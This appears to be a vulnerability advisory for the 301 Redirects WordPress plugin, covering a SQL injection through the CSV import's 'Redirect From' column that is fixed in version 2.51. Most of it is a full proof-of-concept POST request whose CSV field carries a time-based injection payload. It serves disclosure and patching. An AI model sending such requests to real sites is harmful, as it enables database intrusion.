The plugin does not sanitise its “Redirect From” column when importing a CSV file, allowing high privilege users to perform SQL injections. The PoC video provided mentioned 2.53 as vulnerable, however v2.45 was installed and used. The issue has been verified to have been fixed in 2.51
POST /wp-admin/options-general.php?page=eps_redirects&tab;=import-export HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wp-admin/options-general.php?page=eps_redirects&tab;=import-export Content-Type: multipart/form-data; boundary=---------------------------28588551781499779692758371208 Content-Length: 682 Connection: close Cookie: [Admin cookies] Upgrade-Insecure-Requests: 1 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name=“eps_redirect_nonce_submit” 283965d8a1 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name=“eps_redirect_upload_file”; filename=“2021-01-19-redirects.csv” Content-Type: text/csv 301,’ or sleep(2)#,/yolo,0 -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name=“eps_redirect_upload” Upload CSV -----------------------------28588551781499779692758371208 Content-Disposition: form-data; name=“eps_redirect_upload_method” skip -----------------------------28588551781499779692758371208–
CPE | Name | Operator | Version |
---|---|---|---|
eps-301-redirects | lt | 2.51 |